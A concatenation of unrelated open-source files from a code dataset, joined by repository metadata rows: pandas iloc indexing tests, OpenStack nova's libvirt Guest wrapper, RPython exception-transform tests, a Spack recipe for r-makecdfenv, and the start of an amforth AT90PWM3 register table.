df.iloc[[1, 0], [0, 1]] = df.iloc[[1, 0], [0, 1]].reset_index(drop=True)
tm.assert_frame_equal(df, expected)
def test_iloc_getitem_frame(self):
df = DataFrame(
np.random.randn(10, 4), index=range(0, 20, 2), columns=range(0, 8, 2)
)
result = df.iloc[2]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
exp = df.ix[4]
tm.assert_series_equal(result, exp)
result = df.iloc[2, 2]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
exp = df.ix[4, 4]
assert result == exp
# slice
result = df.iloc[4:8]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[8:14]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 2:3]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[:, 4:5]
tm.assert_frame_equal(result, expected)
# list of integers
result = df.iloc[[0, 1, 3]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[0, 2, 6]]
tm.assert_frame_equal(result, expected)
result = df.iloc[[0, 1, 3], [0, 1]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[0, 2, 6], [0, 2]]
tm.assert_frame_equal(result, expected)
# neg indices
result = df.iloc[[-1, 1, 3], [-1, 1]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[18, 2, 6], [6, 2]]
tm.assert_frame_equal(result, expected)
# dups indices
result = df.iloc[[-1, -1, 1, 3], [-1, 1]]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[18, 18, 2, 6], [6, 2]]
tm.assert_frame_equal(result, expected)
# with index-like
s = Series(index=range(1, 5))
result = df.iloc[s.index]
with catch_warnings(record=True):
filterwarnings("ignore", "\\n.ix", FutureWarning)
expected = df.ix[[2, 4, 6, 8]]
tm.assert_frame_equal(result, expected)
def test_iloc_getitem_labelled_frame(self):
# try with labelled frame
df = DataFrame(
np.random.randn(10, 4), index=list("abcdefghij"), columns=list("ABCD")
)
result = df.iloc[1, 1]
exp = df.loc["b", "B"]
assert result == exp
result = df.iloc[:, 2:3]
expected = df.loc[:, ["C"]]
tm.assert_frame_equal(result, expected)
# negative indexing
result = df.iloc[-1, -1]
exp = df.loc["j", "D"]
assert result == exp
# out-of-bounds exception
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[10, 5]
# trying to use a label
msg = (
r"Location based indexing can only have \[integer, integer"
r" slice \(START point is INCLUDED, END point is EXCLUDED\),"
r" listlike of integers, boolean array\] types"
)
with pytest.raises(ValueError, match=msg):
df.iloc["j", "D"]
def test_iloc_getitem_doc_issue(self):
# multi axis slicing issue with single block
# surfaced in GH 6059
arr = np.random.randn(6, 4)
index = date_range("20130101", periods=6)
columns = list("ABCD")
df = DataFrame(arr, index=index, columns=columns)
# defines ref_locs
df.describe()
result = df.iloc[3:5, 0:2]
str(result)
result.dtypes
expected = DataFrame(arr[3:5, 0:2], index=index[3:5], columns=columns[0:2])
tm.assert_frame_equal(result, expected)
# for dups
df.columns = list("aaaa")
result = df.iloc[3:5, 0:2]
str(result)
result.dtypes
expected = DataFrame(arr[3:5, 0:2], index=index[3:5], columns=list("aa"))
tm.assert_frame_equal(result, expected)
# related
arr = np.random.randn(6, 4)
index = list(range(0, 12, 2))
columns = list(range(0, 8, 2))
df = DataFrame(arr, index=index, columns=columns)
df._data.blocks[0].mgr_locs
result = df.iloc[1:5, 2:4]
str(result)
result.dtypes
expected = DataFrame(arr[1:5, 2:4], index=index[1:5], columns=columns[2:4])
tm.assert_frame_equal(result, expected)
def test_iloc_setitem_series(self):
df = DataFrame(
np.random.randn(10, 4), index=list("abcdefghij"), columns=list("ABCD")
)
df.iloc[1, 1] = 1
result = df.iloc[1, 1]
assert result == 1
df.iloc[:, 2:3] = 0
expected = df.iloc[:, 2:3]
result = df.iloc[:, 2:3]
tm.assert_frame_equal(result, expected)
s = Series(np.random.randn(10), index=range(0, 20, 2))
s.iloc[1] = 1
result = s.iloc[1]
assert result == 1
s.iloc[:4] = 0
expected = s.iloc[:4]
result = s.iloc[:4]
tm.assert_series_equal(result, expected)
s = Series([-1] * 6)
s.iloc[0::2] = [0, 2, 4]
s.iloc[1::2] = [1, 3, 5]
result = s
expected = Series([0, 1, 2, 3, 4, 5])
tm.assert_series_equal(result, expected)
def test_iloc_setitem_list_of_lists(self):
# GH 7551
# list-of-list is set incorrectly in mixed vs. single dtyped frames
df = DataFrame(
dict(A=np.arange(5, dtype="int64"), B=np.arange(5, 10, dtype="int64"))
)
df.iloc[2:4] = [[10, 11], [12, 13]]
expected = DataFrame(dict(A=[0, 1, 10, 12, 4], B=[5, 6, 11, 13, 9]))
tm.assert_frame_equal(df, expected)
df = DataFrame(dict(A=list("abcde"), B=np.arange(5, 10, dtype="int64")))
df.iloc[2:4] = [["x", 11], ["y", 13]]
expected = DataFrame(dict(A=["a", "b", "x", "y", "e"], B=[5, 6, 11, 13, 9]))
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("indexer", [[0], slice(None, 1, None), np.array([0])])
@pytest.mark.parametrize("value", [["Z"], np.array(["Z"])])
def test_iloc_setitem_with_scalar_index(self, indexer, value):
# GH #19474
# assigning like "df.iloc[0, [0]] = ['Z']" should be evaluated
# elementwisely, not using "setter('A', ['Z'])".
df = pd.DataFrame([[1, 2], [3, 4]], columns=["A", "B"])
df.iloc[0, indexer] = value
result = df.iloc[0, 0]
assert is_scalar(result) and result == "Z"
def test_iloc_mask(self):
# GH 3631, iloc with a mask (of a series) should raise
df = DataFrame(list(range(5)), index=list("ABCDE"), columns=["a"])
mask = df.a % 2 == 0
msg = "iLocation based boolean indexing cannot use an indexable as a mask"
with pytest.raises(ValueError, match=msg):
df.iloc[mask]
mask.index = range(len(mask))
msg = "iLocation based boolean indexing on an integer type is not available"
with pytest.raises(NotImplementedError, match=msg):
df.iloc[mask]
# ndarray ok
result = df.iloc[np.array([True] * len(mask), dtype=bool)]
tm.assert_frame_equal(result, df)
# the possibilities
locs = np.arange(4)
nums = 2 ** locs
reps = [bin(num) for num in nums]
df = DataFrame({"locs": locs, "nums": nums}, reps)
expected = {
(None, ""): "0b1100",
(None, ".loc"): "0b1100",
(None, ".iloc"): "0b1100",
("index", ""): "0b11",
("index", ".loc"): "0b11",
("index", ".iloc"): (
"iLocation based boolean indexing cannot use an indexable as a mask"
),
("locs", ""): "Unalignable boolean Series provided as indexer "
"(index of the boolean Series and of the indexed "
"object do not match).",
("locs", ".loc"): "Unalignable boolean Series provided as indexer "
"(index of the boolean Series and of the "
"indexed object do not match).",
("locs", ".iloc"): (
"iLocation based boolean indexing on an "
"integer type is not available"
),
}
# UserWarnings from reindex of a boolean mask
with catch_warnings(record=True):
simplefilter("ignore", UserWarning)
result = dict()
for idx in [None, "index", "locs"]:
mask = (df.nums > 2).values
if idx:
mask = Series(mask, list(reversed(getattr(df, idx))))
for method in ["", ".loc", ".iloc"]:
try:
if method:
accessor = getattr(df, method[1:])
else:
accessor = df
ans = str(bin(accessor[mask]["nums"].sum()))
except Exception as e:
ans = str(e)
key = tuple([idx, method])
r = expected.get(key)
if r != ans:
raise AssertionError(
"[{key}] does not match [{ans}], received [{r}]".format(
key=key, ans=ans, r=r
)
)
def test_iloc_non_unique_indexing(self):
# GH 4017, non-unique indexing (on the axis)
df = DataFrame({"A": [0.1] * 3000, "B": [1] * 3000})
idx = np.arange(30) * 99
expected = df.iloc[idx]
df3 = concat([df, 2 * df, 3 * df])
result = df3.iloc[idx]
tm.assert_frame_equal(result, expected)
df2 = DataFrame({"A": [0.1] * 1000, "B": [1] * 1000})
df2 = concat([df2, 2 * df2, 3 * df2])
sidx = df2.index.to_series()
expected = df2.iloc[idx[idx <= sidx.max()]]
new_list = []
for r, s in expected.iterrows():
new_list.append(s)
new_list.append(s * 2)
new_list.append(s * 3)
expected = DataFrame(new_list)
expected = concat([expected, DataFrame(index=idx[idx > sidx.max()])], sort=True)
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
result = df2.loc[idx]
tm.assert_frame_equal(result, expected, check_index_type=False)
def test_iloc_empty_list_indexer_is_ok(self):
from pandas.util.testing import makeCustomDataframe as mkdf
df = mkdf(5, 2)
# vertical empty
tm.assert_frame_equal(
df.iloc[:, []],
df.iloc[:, :0],
check_index_type=True,
check_column_type=True,
)
# horizontal empty
tm.assert_frame_equal(
df.iloc[[], :],
df.iloc[:0, :],
check_index_type=True,
check_column_type=True,
)
# horizontal empty
tm.assert_frame_equal(
df.iloc[[]], df.iloc[:0, :], check_index_type=True, check_column_type=True
)
def test_identity_slice_returns_new_object(self):
# GH13873
original_df = DataFrame({"a": [1, 2, 3]})
sliced_df = original_df.iloc[:]
assert sliced_df is not original_df
# should be a shallow copy
original_df["a"] = [4, 4, 4]
assert (sliced_df["a"] == 4).all()
original_series = Series([1, 2, 3, 4, 5, 6])
sliced_series = original_series.iloc[:]
assert sliced_series is not original_series
# should also be a shallow copy
original_series[:3] = [7, 8, 9]
assert all(sliced_series[:3] == [7, 8, 9])
def test_indexing_zerodim_np_array(self):
# GH24919
df = DataFrame([[1, 2], [3, 4]])
result = df.iloc[np.array(0)]
s = pd.Series([1, 2], name=0)
tm.assert_series_equal(result, s)
def test_series_indexing_zerodim_np_array(self):
# GH24919
s = Series([1, 2])
result = s.iloc[np.array(0)]
assert result == 1
| apache-2.0 | 1,716,900,563,005,315,300 | 31.677656 | 88 | 0.50114 | false |
zzicewind/nova | nova/virt/libvirt/guest.py | 6 | 13722 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2015 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the guest.
This class encapsulates a libvirt domain and provides certain
higher level APIs around the raw libvirt API. These APIs are
then used by all the other libvirt related classes.
"""
from lxml import etree
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova import utils
from nova.virt.libvirt import config as vconfig
libvirt = None
LOG = logging.getLogger(__name__)
class Guest(object):
def __init__(self, domain):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._domain = domain
def __repr__(self):
return "<Guest %(id)d %(name)s %(uuid)s>" % {
'id': self.id,
'name': self.name,
'uuid': self.uuid
}
@property
def id(self):
return self._domain.ID()
@property
def uuid(self):
return self._domain.UUIDString()
@property
def name(self):
return self._domain.name()
@property
def _encoded_xml(self):
return encodeutils.safe_decode(self._domain.XMLDesc(0))
@classmethod
def create(cls, xml, host):
"""Create a new Guest
:param xml: XML definition of the domain to create
:param host: host.Host connection to define the guest on
:returns guest.Guest: Guest ready to be launched
"""
try:
# TODO(sahid): Host.write_instance_config should return
# an instance of Guest
domain = host.write_instance_config(xml)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error defining a domain with XML: %s') %
encodeutils.safe_decode(xml))
return cls(domain)
def launch(self, pause=False):
"""Starts a created guest.
:param pause: Indicates whether to start and pause the guest
"""
flags = pause and libvirt.VIR_DOMAIN_START_PAUSED or 0
try:
return self._domain.createWithFlags(flags)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error launching a defined domain '
'with XML: %s') %
self._encoded_xml, errors='ignore')
def poweroff(self):
"""Stops a running guest."""
self._domain.destroy()
def inject_nmi(self):
"""Injects an NMI to a guest."""
self._domain.injectNMI()
def resume(self):
"""Resumes a suspended guest."""
self._domain.resume()
def enable_hairpin(self):
"""Enables hairpin mode for this guest."""
interfaces = self.get_interfaces()
try:
for interface in interfaces:
utils.execute(
'tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error enabling hairpin mode with XML: %s') %
self._encoded_xml, errors='ignore')
def get_interfaces(self):
"""Returns a list of all network interfaces for this domain."""
doc = None
try:
doc = etree.fromstring(self._encoded_xml)
except Exception:
return []
interfaces = []
nodes = doc.findall('./devices/interface/target')
for target in nodes:
interfaces.append(target.get('dev'))
return interfaces
def get_vcpus_info(self):
"""Returns virtual cpus information of guest.
:returns: guest.VCPUInfo
"""
vcpus = self._domain.vcpus()
if vcpus is not None:
for vcpu in vcpus[0]:
yield VCPUInfo(
id=vcpu[0], cpu=vcpu[3], state=vcpu[1], time=vcpu[2])
def delete_configuration(self):
"""Undefines a domain from hypervisor."""
try:
self._domain.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug("Error from libvirt during undefineFlags. %d"
"Retrying with undefine", self.id)
self._domain.undefine()
except AttributeError:
# Older versions of libvirt don't support undefine flags,
# trying to remove managed image
try:
if self._domain.hasManagedSaveImage(0):
self._domain.managedSaveRemove(0)
except AttributeError:
pass
self._domain.undefine()
def has_persistent_configuration(self):
"""Whether domain config is persistently stored on the host."""
return self._domain.isPersistent()
def attach_device(self, conf, persistent=False, live=False):
"""Attaches device to the guest.
:param conf: A LibvirtConfigObject of the device to attach
:param persistent: A bool to indicate whether the change is
persistent or not
        :param live: A bool to indicate whether it affects the guest
in running state
"""
flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
self._domain.attachDeviceFlags(conf.to_xml(), flags=flags)
def get_disk(self, device):
"""Returns the disk mounted at device
        :returns LibvirtConfigGuestDisk: mounted at device or None
"""
try:
doc = etree.fromstring(self._domain.XMLDesc(0))
except Exception:
return None
node = doc.find("./devices/disk/target[@dev='%s'].." % device)
if node is not None:
conf = vconfig.LibvirtConfigGuestDisk()
conf.parse_dom(node)
return conf
def detach_device(self, conf, persistent=False, live=False):
"""Detaches device to the guest.
:param conf: A LibvirtConfigObject of the device to detach
:param persistent: A bool to indicate whether the change is
persistent or not
        :param live: A bool to indicate whether it affects the guest
in running state
"""
flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
self._domain.detachDeviceFlags(conf.to_xml(), flags=flags)
def get_xml_desc(self, dump_inactive=False, dump_sensitive=False,
dump_migratable=False):
"""Returns xml description of guest.
:param dump_inactive: Dump inactive domain information
:param dump_sensitive: Dump security sensitive information
:param dump_migratable: Dump XML suitable for migration
:returns string: XML description of the guest
"""
flags = dump_inactive and libvirt.VIR_DOMAIN_XML_INACTIVE or 0
flags |= dump_sensitive and libvirt.VIR_DOMAIN_XML_SECURE or 0
flags |= dump_migratable and libvirt.VIR_DOMAIN_XML_MIGRATABLE or 0
return self._domain.XMLDesc(flags=flags)
def save_memory_state(self):
"""Saves the domain's memory state. Requires running domain.
raises: raises libvirtError on error
"""
self._domain.managedSave(0)
def get_block_device(self, disk):
"""Returns a block device wrapper for disk."""
return BlockDevice(self, disk)
def set_user_password(self, user, new_pass):
"""Configures a new user password."""
self._domain.setUserPassword(user, new_pass, 0)
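# Illustrative sketch only -- this helper is NOT part of the original nova
# module. ``host`` is assumed to be a nova.virt.libvirt.host.Host and ``xml``
# a valid libvirt domain XML string.
def _example_guest_lifecycle(host, xml):
    """Show the intended define -> launch -> inspect flow of Guest."""
    guest = Guest.create(xml, host)    # defines the domain on the host
    guest.launch(pause=False)          # starts it immediately
    return guest.get_interfaces()      # e.g. ['tap0', 'tap1']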
class BlockDevice(object):
"""Wrapper around block device API"""
REBASE_DEFAULT_BANDWIDTH = 0 # in MiB/s - 0 unlimited
COMMIT_DEFAULT_BANDWIDTH = 0 # in MiB/s - 0 unlimited
def __init__(self, guest, disk):
self._guest = guest
self._disk = disk
def abort_job(self, async=False, pivot=False):
"""Request to cancel any job currently running on the block.
:param async: Request only, do not wait for completion
:param pivot: Pivot to new file when ending a copy or
active commit job
"""
flags = async and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_ASYNC or 0
flags |= pivot and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT or 0
self._guest._domain.blockJobAbort(self._disk, flags=flags)
def get_job_info(self):
"""Returns information about job currently running
:returns: BlockDeviceJobInfo or None
"""
status = self._guest._domain.blockJobInfo(self._disk, flags=0)
if status != -1:
return BlockDeviceJobInfo(
job=status.get("type", 0),
bandwidth=status.get("bandwidth", 0),
cur=status.get("cur", 0),
end=status.get("end", 0))
def rebase(self, base, shallow=False, reuse_ext=False,
copy=False, relative=False):
"""Rebases block to new base
:param shallow: Limit copy to top of source backing chain
:param reuse_ext: Reuse existing external file of a copy
:param copy: Start a copy job
:param relative: Keep backing chain referenced using relative names
"""
flags = shallow and libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW or 0
flags |= reuse_ext and libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT or 0
flags |= copy and libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY or 0
flags |= relative and libvirt.VIR_DOMAIN_BLOCK_REBASE_RELATIVE or 0
return self._guest._domain.blockRebase(
self._disk, base, self.REBASE_DEFAULT_BANDWIDTH, flags=flags)
def commit(self, base, top, relative=False):
"""Commit on block device
        For performance during live snapshot it reduces the disk chain
to a single disk.
:param relative: Keep backing chain referenced using relative names
"""
flags = relative and libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE or 0
return self._guest._domain.blockCommit(
self._disk, base, top, self.COMMIT_DEFAULT_BANDWIDTH, flags=flags)
def resize(self, size_kb):
"""Resizes block device to Kib size."""
self._guest._domain.blockResize(self._disk, size_kb)
def wait_for_job(self, abort_on_error=False, wait_for_job_clean=False):
"""Wait for libvirt block job to complete.
Libvirt may return either cur==end or an empty dict when
the job is complete, depending on whether the job has been
cleaned up by libvirt yet, or not.
:param abort_on_error: Whether to stop process and raise NovaException
on error (default: False)
:param wait_for_job_clean: Whether to force wait to ensure job is
finished (see bug: LP#1119173)
:returns: True if still in progress
False if completed
"""
status = self.get_job_info()
if not status and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
if wait_for_job_clean:
job_ended = status.job == 0
else:
job_ended = status.cur == status.end
return not job_ended
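# Illustrative sketch (assumption, not part of the original module): callers
# of BlockDevice.wait_for_job() typically poll it until the block job ends,
# for example:
#
#     import time
#     block_dev = guest.get_block_device('vda')   # 'vda' is a made-up name
#     while block_dev.wait_for_job(wait_for_job_clean=True):
#         time.sleep(0.5)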
class VCPUInfo(object):
def __init__(self, id, cpu, state, time):
"""Structure for information about guest vcpus.
:param id: The virtual cpu number
:param cpu: The host cpu currently associated
:param state: The running state of the vcpu (0 offline, 1 running, 2
blocked on resource)
:param time: The cpu time used in nanoseconds
"""
self.id = id
self.cpu = cpu
self.state = state
self.time = time
class BlockDeviceJobInfo(object):
def __init__(self, job, bandwidth, cur, end):
"""Structure for information about running job.
:param job: The running job (0 placeholder, 1 pull,
2 copy, 3 commit, 4 active commit)
:param bandwidth: Used in MiB/s
:param cur: Indicates the position between 0 and 'end'
:param end: Indicates the position for this operation
"""
self.job = job
self.bandwidth = bandwidth
self.cur = cur
self.end = end
| apache-2.0 | -6,999,380,690,129,891,000 | 34.457364 | 78 | 0.608439 | false |
oblique-labs/pyVM | rpython/translator/test/test_exceptiontransform.py | 2 | 8603 | import py
from rpython.translator.translator import TranslationContext, graphof
from rpython.translator.simplify import join_blocks
from rpython.translator import exceptiontransform
from rpython.flowspace.model import summary
from rpython.rtyper.test.test_llinterp import get_interpreter
from rpython.translator.backendopt.all import backend_optimizations
from rpython.conftest import option
import sys
def check_debug_build():
# the 'not option.view' is because debug builds rarely
# have pygame, so if you want to see the graphs pass --view and
# don't be surprised when the test then passes when it shouldn't.
if not hasattr(sys, 'gettotalrefcount') and not option.view:
py.test.skip("test needs a debug build of Python")
_already_transformed = {}
def interpret(func, values):
interp, graph = get_interpreter(func, values)
t = interp.typer.annotator.translator
if t not in _already_transformed:
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.transform_completely()
_already_transformed[t] = True
return interp.eval_graph(graph, values)
class TestExceptionTransform:
def compile(self, fn, inputargs):
from rpython.translator.c.test.test_genc import compile
return compile(fn, inputargs)
def transform_func(self, fn, inputtypes, backendopt=False):
t = TranslationContext()
t.buildannotator().build_types(fn, inputtypes)
t.buildrtyper().specialize()
if option.view:
t.view()
if backendopt:
backend_optimizations(t)
g = graphof(t, fn)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
join_blocks(g)
if option.view:
t.view()
return t, g
def test_simple(self):
def one():
return 1
def foo():
one()
return one()
t, g = self.transform_func(foo, [])
assert len(list(g.iterblocks())) == 2 # graph does not change
result = interpret(foo, [])
assert result == 1
f = self.compile(foo, [])
assert f() == 1
def test_passthrough(self):
def one(x):
if x:
raise ValueError()
def foo():
one(0)
one(1)
t, g = self.transform_func(foo, [])
f = self.compile(foo, [])
f(expected_exception_name='ValueError')
def test_catches(self):
def one(x):
if x == 1:
raise ValueError()
elif x == 2:
raise TypeError()
return x - 5
def foo(x):
x = one(x)
try:
x = one(x)
except ValueError:
return 1 + x
except TypeError:
return 2 + x
except:
return 3 + x
return 4 + x
t, g = self.transform_func(foo, [int])
assert len(list(g.iterblocks())) == 10
f = self.compile(foo, [int])
result = interpret(foo, [6])
assert result == 2
result = f(6)
assert result == 2
result = interpret(foo, [7])
assert result == 4
result = f(7)
assert result == 4
result = interpret(foo, [8])
assert result == 2
result = f(8)
assert result == 2
def test_bare_except(self):
def one(x):
if x == 1:
raise ValueError()
elif x == 2:
raise TypeError()
return x - 5
def foo(x):
x = one(x)
try:
x = one(x)
except:
return 1 + x
return 4 + x
t, g = self.transform_func(foo, [int])
assert len(list(g.iterblocks())) == 6
f = self.compile(foo, [int])
result = interpret(foo, [6])
assert result == 2
result = f(6)
assert result == 2
result = interpret(foo, [7])
assert result == 3
result = f(7)
assert result == 3
result = interpret(foo, [8])
assert result == 2
result = f(8)
assert result == 2
def test_raises(self):
def foo(x):
if x:
raise ValueError()
t, g = self.transform_func(foo, [int])
assert len(list(g.iterblocks())) == 3
f = self.compile(foo, [int])
f(0)
f(1, expected_exception_name='ValueError')
def test_no_multiple_transform(self):
def f(x):
return x + 1
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
g = graphof(t, f)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
etrafo2 = exceptiontransform.ExceptionTransformer(t)
py.test.raises(AssertionError, etrafo2.create_exception_handling, g)
def test_preserve_can_raise(self):
def f(x):
raise ValueError
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
g = graphof(t, f)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
assert etrafo.raise_analyzer.analyze_direct_call(g)
def test_reraise_is_not_raise(self):
def one(x):
if x == 1:
raise ValueError()
elif x == 2:
raise TypeError()
return x - 5
def foo(x):
try:
return one(x)
except ValueError:
return -42
t, g = self.transform_func(foo, [int])
for block in g.iterblocks():
for op in block.operations:
# the operation 'debug_record_traceback' should only show up
# in a normal raise, not in a reraise
assert op.opname != 'debug_record_traceback'
f = self.compile(foo, [int])
result = interpret(foo, [7])
assert result == 2
result = f(7)
assert result == 2
result = interpret(foo, [1])
assert result == -42
result = f(1)
assert result == -42
def test_needs_keepalive(self):
check_debug_build()
from rpython.rtyper.lltypesystem import lltype
X = lltype.GcStruct("X",
('y', lltype.Struct("Y", ('z', lltype.Signed))))
def can_raise(n):
if n:
raise Exception
else:
return 1
def foo(n):
x = lltype.malloc(X)
y = x.y
y.z = 42
r = can_raise(n)
return r + y.z
f = self.compile(foo, [int])
res = f(0)
assert res == 43
def test_inserting_zeroing_op(self):
from rpython.rtyper.lltypesystem import lltype
S = lltype.GcStruct("S", ('x', lltype.Signed))
def f(x):
s = lltype.malloc(S)
s.x = 0
return s.x
t = TranslationContext()
t.buildannotator().build_types(f, [int])
t.buildrtyper().specialize()
g = graphof(t, f)
etrafo = exceptiontransform.ExceptionTransformer(t)
etrafo.create_exception_handling(g)
ops = dict.fromkeys([o.opname for b, o in g.iterblockops()])
assert 'zero_gc_pointers_inside' in ops
def test_llexternal(self):
from rpython.rtyper.lltypesystem.rffi import llexternal
from rpython.rtyper.lltypesystem import lltype
z = llexternal('z', [lltype.Signed], lltype.Signed)
def f(x):
y = -1
if x > 0:
y = z(x)
return y + x
        t, g = self.transform_func(f, [int], True)
# llexternals normally should not raise, the graph should have no exception
# checking
assert summary(g) == {'int_gt': 1, 'int_add': 1, 'direct_call': 1}
def test_get_exception_addr(self):
from rpython.rtyper.lltypesystem import lltype, llmemory
from rpython.rtyper.lltypesystem.lloperation import llop
def foo():
# a bit hard to test, really
a = llop.get_exception_addr(llmemory.Address)
assert lltype.typeOf(a) is llmemory.Address
a = llop.get_exc_value_addr(llmemory.Address)
assert lltype.typeOf(a) is llmemory.Address
return 42
f = self.compile(foo, [])
res = f()
assert res == 42
| mit | 5,744,993,715,818,964,000 | 31.100746 | 83 | 0.541439 | false |
iulian787/spack | var/spack/repos/builtin/packages/r-makecdfenv/package.py | 5 | 1307 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RMakecdfenv(RPackage):
"""CDF Environment Maker.
This package has two functions. One reads a Affymetrix chip description
file (CDF) and creates a hash table environment containing the
location/probe set membership mapping. The other creates a package that
automatically loads that environment."""
homepage = "https://bioconductor.org/packages/makecdfenv"
git = "https://git.bioconductor.org/packages/makecdfenv.git"
version('1.60.0', commit='900ece3ecd7a0ade9f8a0374e5a03def4e079cb3')
version('1.58.0', commit='6f513e39c4920a6da10d22718fc3bf278fe5ffe2')
version('1.56.0', commit='f6b48e9a9f18598653d05bc0bdffeae7fefbb327')
version('1.54.0', commit='3ff646ddc4b028e46b1e091ff9c2d17ce77cec26')
version('1.52.0', commit='b88a3e93e3b7feeeca69eda7c1fc5a0826c81120')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-affyio', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-affy', type=('build', 'run'))
depends_on('r-zlibbioc', type=('build', 'run'))
| lgpl-2.1 | 3,896,769,160,650,301,400 | 42.566667 | 78 | 0.713083 | false |
wexi/amforth-shadow | core/devices/at90pwm3/device.py | 5 | 3375 | # Partname: AT90PWM3
# Built using part description XML file version 179
# generated automatically, do not edit
MCUREGS = {
'ADCH': '$79',
'ADCL': '$78',
'ADCSRA': '$7A',
'ADCSRB': '$7B',
'ADMUX': '$7C',
'AMP0CSR': '$76',
'AMP1CSR': '$77',
'DIDR0': '$7E',
'DIDR1': '$7F',
'AC0CON': '$AD',
'AC1CON': '$AE',
'AC2CON': '$AF',
'ACSR': '$50',
'SPMCSR': '$57',
'CLKPR': '$61',
'GPIOR0': '$3E',
'GPIOR1': '$39',
'GPIOR2': '$3A',
'GPIOR3': '$3B',
'MCUCR': '$55',
'MCUSR': '$54',
'OSCCAL': '$66',
'PLLCSR': '$49',
'PRR': '$64',
'SMCR': '$53',
'SPH': '$5E',
'SPL': '$5D',
'SREG': '$5F',
'DACH': '$AC',
'DACL': '$AB',
'DACON': '$AA',
'EEARH': '$42',
'EEARL': '$41',
'EECR': '$3F',
'EEDR': '$40',
'EUCSRA': '$C8',
'EUCSRB': '$C9',
'EUCSRC': '$CA',
'EUDR': '$CE',
'MUBRRH': '$CD',
'MUBRRL': '$CC',
'EICRA': '$69',
'EIFR': '$3C',
'EIMSK': '$3D',
'DDRB': '$24',
'PINB': '$23',
'PORTB': '$25',
'DDRC': '$27',
'PINC': '$26',
'PORTC': '$28',
'DDRD': '$2A',
'PIND': '$29',
'PORTD': '$2B',
'DDRE': '$2D',
'PINE': '$2C',
'PORTE': '$2E',
'OCR0RAH': '$D5',
'OCR0RAL': '$D4',
'OCR0RBH': '$D9',
'OCR0RBL': '$D8',
'OCR0SAH': '$D3',
'OCR0SAL': '$D2',
'OCR0SBH': '$D7',
'OCR0SBL': '$D6',
'PCNF0': '$DA',
'PCTL0': '$DB',
'PFRC0A': '$DC',
'PFRC0B': '$DD',
'PICR0H': '$DF',
'PICR0L': '$DE',
'PIFR0': '$A0',
'PIM0': '$A1',
'PSOC0': '$D0',
'OCR1RAH': '$E5',
'OCR1RAL': '$E4',
'OCR1RBH': '$E9',
'OCR1RBL': '$E8',
'OCR1SAH': '$E3',
'OCR1SAL': '$E2',
'OCR1SBH': '$E7',
'OCR1SBL': '$E6',
'PCNF1': '$EA',
'PCTL1': '$EB',
'PFRC1A': '$EC',
'PFRC1B': '$ED',
'PICR1H': '$EF',
'PICR1L': '$EE',
'PIFR1': '$A2',
'PIM1': '$A3',
'PSOC1': '$E0',
'OCR2RAH': '$F5',
'OCR2RAL': '$F4',
'OCR2RBH': '$F9',
